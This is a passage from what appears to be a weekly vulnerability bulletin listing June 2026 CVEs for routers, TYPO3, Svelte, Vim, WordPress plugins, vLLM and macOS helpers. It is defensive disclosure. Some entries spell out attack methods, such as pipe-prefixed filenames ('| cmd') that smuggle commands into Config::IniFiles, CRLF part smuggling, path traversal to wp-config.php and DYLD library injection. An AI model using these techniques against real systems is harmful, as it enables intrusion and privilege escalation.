| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain a stack overflow in the wl_radio parameter of the formWifiRadioSet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36792 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain multiple stack overflows in the formwrlSSIDset function via the mit_ssid and mis_ssid_index parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36793 |
| Shenzhen Tenda Technology Co. Ltd--Tenda W3 Wireless Router | Shenzhen Tenda Technology Co., Ltd Tenda W3 Wireless Router v1.0.0.3(2204) was discovered to contain multiple stack overflows in the R7WebsSecurityHandler function via the username and password parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-09 | not yet calculated | CVE-2026-36794 |
| SHLOMIF--Config::IniFiles | Config::IniFiles versions before 3.001000 for Perl allow OS command injection and file overwrite via a 2-arg open() of the -file argument in _make_filehandle. Config::IniFiles::_make_filehandle opens a filename argument with Perl's 2-arg open(), so a filename that begins or ends with a pipe ("| cmd", "cmd |") or begins with a redirect ("> path", ">> path") is run as a command or redirect rather than opened as a file. The helper is the open path behind the documented -file argument: new(-file => $thing) reaches it through ReadConfig. An in-memory scalar reference (-file => \$text) does not open a path and is unaffected. Any caller that forwards untrusted input to the -file argument can run an arbitrary command or truncate a file under the process UID. | 2026-06-14 | not yet calculated | CVE-2026-11527 |
| simpleble--simpleble | SimpleBLE is a cross-platform library and bindings for Bluetooth Low Energy (BLE). Prior to version 0.14.0, there are multiple stack-based buffer overflow vulnerabilities in SimpleBLE. There is a stack overflow vulnerability in the dongl backend's Protocol::simpleble_write function (local, caller-controlled input). There is also a stack overflow vulnerability when processing manufacturer-specific data in BLE advertisements (remote, no pairing or connection required). Lastly, there is a stack overflow vulnerability when processing service data in BLE advertisements (remote, no pairing or connection required). This issue has been patched in version 0.14.0. | 2026-06-09 | not yet calculated | CVE-2026-44634 |
| Slate Digital LLC--Slate Digital Connect | Slate Digital Connect 1.37.0 for macOS installs a privileged helper tool, com.slatedigital.connect.privileged.helper.tool, which exposes the XPC service com.slatedigital.connect.privileged.helper.tool2. The helper validates connecting XPC clients by checking only the subject.OU value of the client's signing certificate and does not verify that the certificate chains to a trusted code-signing authority. A local attacker can sign a malicious client with a self-signed certificate containing the expected organizational unit value and connect to the privileged XPC service. This allows unauthorized access to privileged helper functionality and may lead to local privilege escalation. | 2026-06-10 | not yet calculated | CVE-2026-24066 |
| Slate Digital LLC--Slate Digital Connect | Slate Digital Connect 1.37.0 for macOS installs a privileged helper tool, com.slatedigital.connect.privileged.helper.tool, which exposes the XPC service com.slatedigital.connect.privileged.helper.tool2. The helper validates connecting XPC clients by obtaining the client's process identifier and using it to retrieve code-signing information for the process. This PID-based client validation is subject to a time-of-check time-of-use race condition because process identifiers can be reused. A local attacker can exploit PID reuse so that validation is performed against a trusted process instead of the original connecting process. This allows unauthorized access to privileged helper functionality and may lead to local privilege escalation. | 2026-06-10 | not yet calculated | CVE-2026-24067 |
| Sonatype--Nexus Repository Manager | A remote unauthenticated attacker may be able to conduct credential-guessing attacks against user accounts in Sonatype Nexus Repository via authentication endpoints. | 2026-06-11 | not yet calculated | CVE-2026-3329 |
| sveltejs--svelte | Svelte is a performance oriented web framework. From version 5.51.5 to before version 5.55.7, an internal regex in the Svelte runtime can take exponential time to test in <svelte:element this={tag}></svelte:element>. This issue has been patched in version 5.55.7. | 2026-06-09 | not yet calculated | CVE-2026-42567 |
| sveltejs--svelte | Svelte is a performance oriented web framework. Prior to version 5.55.7, Svelte was vulnerable to DOM clobbering of its internal framework state on elements, potentially leading to XSS attacks. This issue has been patched in version 5.55.7. | 2026-06-09 | not yet calculated | CVE-2026-42573 |
| sveltejs--svelte | Svelte is a performance oriented web framework. Prior to version 5.55.7, when using spread syntax to render attributes from untrusted data, event handler properties are included in the rendered HTML output. If an application spreads user-controlled or external data as element attributes, an attacker can inject malicious event handlers that execute in victims' browsers. Note that this vulnerability only triggers if the user's browser has JavaScript enabled but Svelte's hydration mechanism does not reach the vulnerable element before the event fires. This issue has been patched in version 5.55.7. | 2026-06-09 | not yet calculated | CVE-2026-42599 |
| Thinkst Applied Research--Canarytokens | An HTML injection vulnerability exists in the "fetch links" email sent by Thinkst Applied Research Canarytokens, enabling Interface Manipulation and Cross-Site Scripting (XSS) in email clients that render HTML emails. This issue affects Canarytokens: from Docker tag sha-c0f3cf142 before sha-08c3f93d, from Git commit c0f3cf142 before 08c3f93d. | 2026-06-10 | not yet calculated | CVE-2026-11859 |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Prior to version 4.1.4, attachment passwords are hashed using SHA-1, a cryptographically broken algorithm. SHA-1 has been vulnerable to collision attacks since 2017 (SHAttered). Version 4.1.4 fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-48488 |
| tngan--samlify | samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify's template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0. | 2026-06-08 | not yet calculated | CVE-2026-46490 |
| TP-Link Systems Inc.--Archer AX12 V1 | An OS command injection vulnerability exists in the VPN module of TP-Link Archer AX12 v1, AX17 v1, AX18 v1, and AX1300 v1.6 routers. This vulnerability allows an adjacent, authenticated attacker to execute arbitrary commands on the device by importing a specially crafted VPN client configuration file. The issue stems from improper filtering of special characters. Successful exploitation of this vulnerability may enable an attacker to gain full control of the affected device, potentially compromising configuration integrity, network security, and service availability. | 2026-06-10 | not yet calculated | CVE-2026-9151 |
| TP-Link Systems Inc.--Archer MR600 v5 | A command injection vulnerability exists in the WireGuard client configuration of Archer MR600 v5 due to improper neutralization of user-controlled input within the web management interface. An authenticated attacker with administrative privileges may be able to execute arbitrary commands when applying configuration changes. Successful exploitation may result in a full compromise of confidentiality, integrity, and availability of the affected device. | 2026-06-08 | not yet calculated | CVE-2026-8913 |
| TP-Link Systems Inc.--Tapo C110 v2 | An authenticated format string vulnerability exists in the ONVIF service of Tapo C110 v2 due to improper handling of user-controlled input. Externally controlled data is interpreted as a format string, which can be used to manipulate stack memory, including control flow data such as return addresses. A remote authenticated attacker may redirect execution flow to existing internal functions, triggering an unauthorized factory reset, leading to loss of configuration, deletion of stored credentials and service disruption. | 2026-06-11 | not yet calculated | CVE-2026-6250 |
| typesense--typesense | Typesense is a fast, typo-tolerant search engine. Prior to versions 29.1 and 30.2, there is an unauthenticated denial-of-service vulnerability in the /multi_search endpoint. A specially crafted request can trigger an unhandled exception during request processing, causing the server process to terminate. This issue can be exploited over the network without authentication and results in service unavailability. The duration of impact may vary depending on system configuration and dataset size. This issue has been patched in versions 29.1 and 30.2. | 2026-06-12 | not yet calculated | CVE-2026-47216 |
| typesense--typesense | Typesense is a fast, typo-tolerant search engine. Prior to versions 29.1 and 30.2, there is a cache isolation issue affecting search requests that use both server-side search result caching and Scoped Search API Keys. Under specific request ordering, cached search results could be reused across requests with different Scoped Search API Key constraints. This could result in a request receiving search results that should have been restricted by its Scoped Search API Key. This issue only affects search requests that use both server-side search result caching and Scoped Search API Keys with embedded filters to restrict access to search results within a collection. This vulnerability may result in unintended disclosure of search results across scoped authorization contexts. This issue has been patched in versions 29.1 and 30.2. | 2026-06-12 | not yet calculated | CVE-2026-47225 |
| TYPO3--HTML Sanitizer | When ALLOW_INSECURE_RAW_TEXT is enabled, whitespace-variant closing tags (e.g., </style\t>) are not recognized by the sanitizer but accepted by browsers as valid end tags, allowing subsequent content to escape sanitization. This allows bypassing the cross-site scripting prevention mechanism of typo3/html-sanitizer before version 2.3.2. | 2026-06-08 | not yet calculated | CVE-2026-47344 |
| TYPO3--HTML Sanitizer | Namespace attributes are not encoded correctly during HTML serialization. This allows bypassing the cross-site scripting prevention mechanism of typo3/html-sanitizer before version 2.3.2. | 2026-06-08 | not yet calculated | CVE-2026-47345 |
| TYPO3--TYPO3 CMS | Backend users with access to the Form Framework were able to use files not ending in .form.yaml as form definitions, which were processed without denying the incorrect file extension. Maliciously crafted form definition files can be used to execute arbitrary SQL statements, allowing attackers to escalate privileges by creating administrative backend user accounts. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-11607 |
| TYPO3--TYPO3 CMS | Non-privileged backend users with file mount access were able to perform write operations (move, delete, rename) on folders representing the root of an active file mount due to missing authorization restrictions. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0 through 11.5.50, 12.0.0 through 12.4.45, 13.0.0 through 13.4.30, and 14.0.0 through 14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47343 |
| TYPO3--TYPO3 CMS | Backend users with file write permissions were able to upload form definition files with mixed-case extensions (e.g., .FORM.YAML) to bypass the Form Framework's upload restriction. Maliciously crafted form definition files can be used to execute arbitrary SQL statements, allowing attackers to escalate privileges by creating administrative backend user accounts. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.50, 12.0.0-12.4.45, 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47346 |
| TYPO3--TYPO3 CMS | Applications that use GeneralUtility::sanitizeLocalUrl to allow only local URLs are vulnerable to open redirect attacks if the URL is used after it has passed the aforementioned sanitization checks. This enables attackers to redirect users to external content and carry out phishing attacks. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.50, 12.0.0-12.4.45, 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47347 |
| TYPO3--TYPO3 CMS | Editors with access to create or modify page content were able to include HTML markup in page titles that were stored in the search index without sanitization. When displayed in frontend search results via the Indexed Search plugin, these titles were rendered without proper output encoding, resulting in a Cross-Site Scripting vulnerability. This issue affects TYPO3 CMS versions 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47348 |
| TYPO3--TYPO3 CMS | Backend users with access to the Recycler module were able to restore soft-deleted records on pages or for tables they were not authorized to modify. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-47349 |
| TYPO3--TYPO3 CMS | Backend users were able to move records to a different page without having edit permissions on the source page. This issue affects TYPO3 CMS versions 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-47350 |
| TYPO3--TYPO3 CMS | Backend users were able to insert arbitrary records and files into the TYPO3 clipboard without proper read permission checks, which allowed users to gather information about records and files they were not authorized to view. This issue affects TYPO3 CMS versions 10.4.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-47351 |
| TYPO3--TYPO3 CMS | Authenticated backend users were able to retrieve file metadata via several Backend API routes without proper permission checks, allowing access to files outside their permitted file mounts or storages. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-47352 |
| TYPO3--TYPO3 CMS | The path allowance check in GeneralUtility::isAllowedAbsPath() performed a plain string prefix comparison without requiring a directory separator boundary, causing a path like /var/www/html-other/secret.yaml to be incorrectly accepted as valid when the project root was /var/www/html. Administrator users with access to the File Abstraction Layer were able to create new file storage definitions pointing to directories outside the project root, bypassing this path check. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-49738 |
| TYPO3--TYPO3 CMS | TYPO3's cache frontend (VariableFrontend) and persistent key-value store (Registry) deserialized PHP payloads without integrity validation or class restrictions. An attacker with write access to the underlying storage backend (cache store or sys_registry database table) could inject a crafted serialized payload to trigger PHP Object Injection, potentially exploiting a gadget chain to achieve Remote Code Execution or other high-impact effects. Exploiting this vulnerability requires direct local write access to the storage, such as the SQL database or file system. This issue affects TYPO3 CMS versions before 10.4.57, 11.0.0-11.5.51, 12.0.0-12.4.46, 13.0.0-13.4.31 and 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-49740 |
| TYPO3--TYPO3 CMS | Backend users with write access to the form_definition database table were able to directly create, update, or delete form definition records via DataHandler, bypassing the Form Framework's persistence validation and permission checks. This allowed injecting arbitrary form configurations, re-enabling attack vectors originally addressed in TYPO3-CORE-SA-2018-003, including SQL injection and privilege escalation. This issue affects TYPO3 CMS versions 14.0.0-14.3.3. | 2026-06-09 | not yet calculated | CVE-2026-49741 |
| TYPO3--TYPO3 CMS | Backend users with file download permissions were able to download files from the fallback storage of the file abstraction layer (FAL) via the Media Module. Since the fallback storage resolves paths relative to the server's document root, this could expose sensitive files such as log files. This issue affects TYPO3 CMS versions 11.0.0-11.5.50, 12.0.0-12.4.45, 13.0.0-13.4.30 and 14.0.0-14.3.2. | 2026-06-09 | not yet calculated | CVE-2026-49742 |
| Unknown--Anti-Spam by CleanTalk. Spam protection | The Anti-Spam by CleanTalk. Spam protection WordPress plugin before 6.79 does not properly sanitize content within a custom shortcode used in its email-encoding feature, allowing unauthenticated attackers to inject arbitrary web scripts into approved comments that will execute when any user (including administrators) views the post. | 2026-06-10 | not yet calculated | CVE-2026-8071 |
| Unknown--Custom Block Builder | The Custom Block Builder WordPress plugin before 4.3.0 does not consistently check the unfiltered_html capability across all paths that write to its block template code fields, allowing administrators on multisite installations (or single-site installs with DISALLOW_UNFILTERED_HTML defined) to inject arbitrary JavaScript that executes for any visitor of pages embedding the affected block. | 2026-06-09 | not yet calculated | CVE-2026-8981 |
| Unknown--Iptanus File Upload | The Iptanus File Upload WordPress plugin before 5.1.7 does not implement proper file handling when the duplicatepolicy setting is configured to "maintain both." Due to a Time-of-Check to Time-of-Use (TOCTOU) race condition between the file existence check and the actual file write operation, an authenticated attacker can overwrite files uploaded by other users. | 2026-06-14 | not yet calculated | CVE-2025-15546 |
| Unknown--KeepInMind Dashboard Notes | Vulnerability Title | 2026-06-12 | not yet calculated | CVE-2026-9271 |
| Unknown--Schema & Structured Data for WP & AMP | The Schema & Structured Data for WP & AMP WordPress plugin before 1.60 does not check user capabilities on its frontend AJAX file-upload handlers and does not validate the actual content of uploaded files against the endpoint's intended media type, allowing unauthenticated users to upload any file type accepted by WordPress's media library through endpoints that should only accept images or videos. | 2026-06-10 | not yet calculated | CVE-2026-9067 |
| Unknown--Secure Copy Content Protection and Content Locking | The Secure Copy Content Protection and Content Locking WordPress plugin before 5.1.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-06-12 | not yet calculated | CVE-2026-9269 |
| Unknown--Store Locator WordPress | The Store Locator WordPress plugin before 1.6.6 does not sanitize and escape one of its settings before storing it and outputting it on the plugin's admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network where the super admin visits the page). | 2026-06-10 | not yet calculated | CVE-2026-9060 |
| Unknown--Store Locator WordPress | The Store Locator WordPress plugin before 1.6.9 does not sanitize and escape store logo metadata before storing it and outputting it on the plugin's admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network). | 2026-06-13 | not yet calculated | CVE-2026-9061 |
| Unknown--Store Locator WordPress | The Store Locator WordPress plugin before 1.6.9 does not validate a parameter before using it in a file path, allowing high-privileged users such as administrators to read arbitrary `.php` files from the server, including configuration files that contain database credentials and authentication keys. | 2026-06-13 | not yet calculated | CVE-2026-9062 |
| Unknown--WPForms | The WPForms WordPress plugin before 1.10.0.5 does not verify the authenticity of incoming PayPal webhook events before processing them, allowing unauthenticated attackers to forge webhook payloads and manipulate the payment state of arbitrary transactions. | 2026-06-09 | not yet calculated | CVE-2026-4986 |
| Unknown--Xstore | The Xstore WordPress theme before 9.7.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. | 2026-06-10 | not yet calculated | CVE-2026-3326 |
| Veeam--Backup and Replication | A vulnerability allowing remote code execution (RCE) on the Backup Server by an authenticated domain user. | 2026-06-09 | not yet calculated | CVE-2026-44963 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0495, a Vimscript code injection vulnerability exists in s:NetrwBookHistSave() in the netrw plugin (runtime/pack/dist/opt/netrw/autoload/netrw.vim) when serializing browsed directory paths to the history file ~/.vim/.netrwhist. A directory name derived from the filesystem is interpolated into a single-quoted Vimscript string literal without escaping embedded single quotes, allowing a crafted directory name to break out of the string context and execute arbitrary Vimscript, including shell commands via system() and :!, the next time the history file is sourced. This issue has been patched in version 9.2.0495. | 2026-06-11 | not yet calculated | CVE-2026-47162 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0496, a code injection vulnerability exists in s:stepmatch() in the cucumber filetype plugin (runtime/ftplugin/cucumber.vim) on Vim builds with +ruby support. Step-definition patterns read from .rb files under the repository's features/*/ or stories/*/ directories are embedded into a Ruby Kernel.eval argument without sufficient escaping, allowing a crafted pattern in an attacker-controlled repository to execute arbitrary Ruby (and through it arbitrary shell commands) when the user invokes a step-jump mapping ([d, ]d). This issue has been patched in version 9.2.0496. | 2026-06-11 | not yet calculated | CVE-2026-47167 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0561, the Python omni-completion script in python3complete.vim for Vim with the +python3 interpreter enabled (and the legacy pythoncomplete.vim for builds with the +python interpreter) executes the import and from statements found in the current buffer through Python's import machinery. Because the buffer's working directory is on sys.path, opening a hostile .py file with a sibling Python package and invoking omni-completion runs that package's top-level code as the editing user. This issue has been patched in version 9.2.0561. | 2026-06-11 | not yet calculated | CVE-2026-52858 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0565, the update_snapshot() function in src/terminal.c copies the visible terminal screen into the scrollback buffer when a snapshot is taken. For each screen cell it walks the cell's chars[] array with no upper bound, stopping only when it encounters a NUL terminator. When a cell legitimately fills all VTERM_MAX_CHARS_PER_CELL (6) slots - a base character plus five combining marks - the bundled libvterm returns the array without a terminating NUL, so the loop reads past the fixed six-element array and appends the out-of-bounds values to a buffer reserved for only six characters. A program whose output is rendered inside a :terminal window can trigger this with a short byte sequence and no Vim scripting, leading to a crash. This issue has been patched in version 9.2.0565. | 2026-06-11 | not yet calculated | CVE-2026-52859 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0597, Vim's Python omni-completion executes reconstructed function and class definitions from the current buffer with exec() as part of populating the completion dictionary. Python evaluates function default values, parameter annotations, and class base expressions at definition time, so a hostile buffer can execute attacker-controlled Python expressions during omni-completion. The existing g:pythoncomplete_allow_import mitigation (GHSA-52mc-rq6p-rc7c) does not cover this path, because the attacker-controlled code is not a harvested import/from statement. This issue has been patched in version 9.2.0597. | 2026-06-11 | not yet calculated | CVE-2026-52860 |
| vivo--PcSuite | An unauthorized access vulnerability exists in the PcSuite APP. The vulnerability can be exploited by attackers to gain unauthorized access to the victim's device. | 2026-06-12 | not yet calculated | CVE-2026-11535 |
| vivo--PcSuite | The connection confirmation pop-up of a specific feature in the PcSuite can be bypassed. | 2026-06-12 | not yet calculated | CVE-2026-12058 |
| vllm-project--vllm-project/vllm | vLLM versions 0.8.0 and later are vulnerable to an Out-of-Memory (OOM) Denial of Service (DoS) attack due to unbounded frame count processing in the `VideoMediaIO.load_base64()` method. When processing `video/jpeg` data URLs, the method splits the base64 data string on commas to extract individual JPEG frames without enforcing a frame count limit. An attacker can exploit this by crafting a single API request containing thousands of comma-separated base64-encoded JPEG frames in a data URL, causing the server to decode all frames into memory and crash due to excessive memory consumption. This vulnerability is reachable via the OpenAI-compatible chat completions API and does not require authentication. | 2026-06-11 | not yet calculated | CVE-2026-5497 |
| Waves Audio Ltd.--Waves Central | Waves Central for macOS versions 13.0.9 through 16.5.5 contain a local privilege escalation vulnerability. A trusted XPC client component included with the product is signed with hardened runtime entitlements that permit dynamic library injection. A local attacker can set the DYLD_INSERT_LIBRARIES environment variable to inject an attacker-controlled dynamic library into the trusted client process at launch. The injected code runs within the signed process and can connect to the product's privileged helper service to invoke privileged operations, resulting in arbitrary code execution as root. The issue is fixed in version 16.6.2. | 2026-06-09 | not yet calculated | CVE-2026-24064 |
| Waves Audio Ltd.--Waves Central | Waves Central for macOS versions 13.0.9 through 16.5.5 contain a local privilege escalation vulnerability in the privileged helper service. The helper validates connecting XPC clients using the client process identifier (PID) to verify code-signing identity. Because process identifiers can be reused, a local attacker can exploit a race condition between the time a connection request is made and the time the helper performs validation, causing the helper to trust an attacker-controlled process. This allows the attacker to invoke privileged operations, resulting in arbitrary code execution as root. The issue is fixed in version 16.6.2. | 2026-06-09 | not yet calculated | CVE-2026-24065 |
| Webkul--Bagisto | This vulnerability exists in Bagisto due to improper validation of user-supplied input in the ImageCacheController component. An unauthenticated remote attacker could exploit this vulnerability by sending crafted path traversal sequences through the filename parameter to access arbitrary files outside the intended directory on the targeted system. Successful exploitation of this vulnerability could allow an attacker to read arbitrary sensitive files on the targeted system. | 2026-06-08 | not yet calculated | CVE-2026-9506 |
| wojtekmach--req | Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in wojtekmach Req allows attacker-controlled HTTP servers to exhaust memory in a Req client via decompression-bomb response bodies. Req's default response pipeline includes Req.Steps.decode_body/1 and Req.Steps.decompress_body/1 in lib/req/steps.ex. decode_body/1 dispatches on the server-supplied content-type (or URL extension) and calls :zip.extract(body, [:memory]) for application/zip, :erl_tar.extract({:binary, body}, [:memory]) for application/x-tar, and :erl_tar.extract({:binary, body}, [:memory, :compressed]) for application/gzip / .tgz. Each returns the full decompressed archive contents as a [{name, bytes}] list in memory, with no per-entry or total size cap. decompress_body/1 walks the content-encoding header and chains :zlib/:brotli/:ezstd decoders, so a response advertising content-encoding: gzip, gzip, gzip inflates through multiple layers without bound. Both steps are enabled by default, no caller opt-in is required, and the attacker controls the content-type and content-encoding headers on their own server (or on any host reached via Req's automatic redirect following). A sub-megabyte response can expand to multiple gigabytes on the victim, crashing the BEAM process. This issue affects req: from 0.1.0 before 0.6.1. | 2026-06-08 | not yet calculated | CVE-2026-49755 |
| wojtekmach--req | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in wojtekmach Req allows multipart parameter smuggling via attacker-influenced part metadata. Req.Utils.encode_form_part/2 in lib/req/utils.ex builds the per-part headers by interpolating the caller-supplied name, filename, and content_type values directly into the content-disposition and content-type lines with no escaping or CRLF stripping. A value containing ", \r, or \n closes the surrounding quoted value and starts a new header line; an additional \r\n--<boundary> terminates the current part and prepends a smuggled part of the attacker's choosing. This is reachable through every supported way of supplying a part. It is particularly easy when value is a %File.Stream{}, because filename then defaults to Path.basename(stream.path) and POSIX filenames may legitimately contain \r and \n. Any application that forwards user-controlled filenames (or field names / MIME types) through Req.post/2 with form_multipart: lets an attacker inject arbitrary headers into the outgoing multipart body or smuggle additional fields and parts into the request the victim service sends downstream. This issue affects req: from 0.5.3 before 0.6.0. | 2026-06-08 | not yet calculated | CVE-2026-49756 |
| X-VPN--X-VPN macOS website | A vulnerability in the quarantine and restore workflow of the X-VPN macOS website versions 77.0 through 77.5 allows a local attacker to leverage a race condition and symlink manipulation to achieve privileged file corruption. | 2026-06-09 | not yet calculated | CVE-2026-2638 |

Vulnerability Summary for the Week of June 1, 2026
Posted on Monday June 08, 2026

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10Web--Photo Gallery by 10Web | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 10Web Photo Gallery by 10Web allows Blind SQL Injection. This issue affects Photo Gallery by 10Web: from n/a through 1.8.41. | 2026-06-04 | 7.6 | CVE-2026-49771 |
| AAM Plugin--Advanced Access Manager | Authentication Bypass by Spoofing vulnerability in AAM Plugin Advanced Access Manager allows URL Encoding. This issue affects Advanced Access Manager: from n/a through 7.1.0. | 2026-06-01 | 7.5 | CVE-2026-42674 |
| ABB--T-MAC Plus | Files or directories accessible to external parties vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 9.9 | CVE-2025-14771 |
| ABB--T-MAC Plus | Authorization bypass through User-Controlled key vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 8.8 | CVE-2025-14772 |
| ABB--T-MAC Plus | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 8 | CVE-2025-14773 |
| ABB--T-MAC Plus | Incorrect Authorization vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. | 2026-06-03 | 7.4 | CVE-2025-14774 |
| ad-manager-wd--Ad Manager WD | WordPress Plugin ad manager wd 1.0.11 contains an arbitrary file download vulnerability that allows unauthenticated attackers to download sensitive files by manipulating the path parameter. Attackers can send GET requests to the edit.php endpoint with export=export_csv and a malicious path parameter to read arbitrary files like wp-config.php accessible to the web server. | 2026-06-04 | 9.8 | CVE-2019-25727 |
| Ahmad--WP Job Portal | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ahmad WP Job Portal allows Blind SQL Injection. This issue affects WP Job Portal: from n/a through 2.5.1. | 2026-06-02 | 9.3 | CVE-2026-42684 |
| Ahmad--WP Job Portal | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ahmad WP Job Portal allows Reflected XSS. This issue affects WP Job Portal: from n/a through 2.5.1. | 2026-06-02 | 7.1 | CVE-2026-42685 |
| Akmer Informatics Automation Industry and Trade Ltd. Co.--TeknoPass | Authorization bypass through User-Controlled SQL primary key vulnerability in Akmer Informatics Automation Industry and Trade Ltd. Co. TeknoPass allows SQL Injection. This issue affects TeknoPass: from 20210501 through 20260429. | 2026-06-04 | 9.8 | CVE-2026-4104 |
| alfio-event--alf.io | alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. Prior to version 2.0-M5-2606, a sandbox escape vulnerability in the alf.io extension script engine allows an authenticated administrator to execute arbitrary operating system commands on the server. The extension system is intended to execute restricted JavaScript in a sandboxed Rhino environment; however, a combination of an unguarded injected Java object (`returnClass`) and an incomplete AST blocklist allows the sandbox to be fully escaped using Java reflection without triggering any validation errors. Version 2.0-M5-2606 patches the issue. | 2026-06-02 | 8 | CVE-2026-35482 |
| Allplayer--AllPlayer | AllPlayer 7.4 contains a local buffer overflow vulnerability in URL handling that allows attackers to overwrite structured exception handling pointers by supplying an excessively long URL string. Attackers can craft a malicious URL, paste it into the Open URL dialog, and trigger SEH-based code execution to run arbitrary commands with user privileges. | 2026-06-04 | 8.4 | CVE-2019-25735 |
| androThemes--Cookiteer | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in androThemes Cookiteer allows PHP Local File Inclusion. This issue affects Cookiteer: from n/a through 1.4.8. | 2026-06-02 | 8.1 | CVE-2025-68886 |
| Anionex--banana-slides | Banana Slides through 0.4.0, patched in commit e8bc490, contains a path traversal vulnerability in the generate_image() function within the AI service backend that allows unauthenticated attackers to read arbitrary image-format files outside the intended uploads directory by exploiting an incomplete path prefix check using os.path.startswith() without a trailing separator. Attackers can supply crafted markdown image references in user-controlled page descriptions that resolve to sibling directories whose names share the uploads folder prefix, bypassing the directory confinement check and causing the application to read files from unintended locations via PIL Image.open(). | 2026-06-01 | 7.5 | CVE-2026-49136 |
| Apache Software Foundation--Apache MINA | ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy. Assessment: Fully addressed. When the serialised stream contains a TC_PROXYCLASSDESC (the marker for a java.lang.reflect.Proxy), JDK's ObjectInputStream.readProxyDesc() is dispatched. JDK then calls the default ObjectInputStream.resolveProxyClass(interfaces) implementation, which performs Class.forName(intf, false, latestUserDefinedLoader()) for EACH interface name and constructs the proxy class, bypassing the accepted classes list. ZDRES-233: Class.forName(name, initialize=true, classLoader) in readClassDescriptor Triggers Static Initialiser of Allow-Listed Classes. Assessment: Fully addressed. For ANY class on the allow-list, deserialising a stream that names it triggers the class's `<clinit>` (static initialiser) BEFORE any instance is constructed. This means an attacker who supplies a class name on the allow-list (e.g., the developer wrote accept("com.myapp.*"), attacker supplies com.myapp.SomeClass) causes `<clinit>` of SomeClass, and many real-world classes have side-effecting static initialisers. Both issues have been fixed. | 2026-06-03 | 9.8 | CVE-2026-47065 |
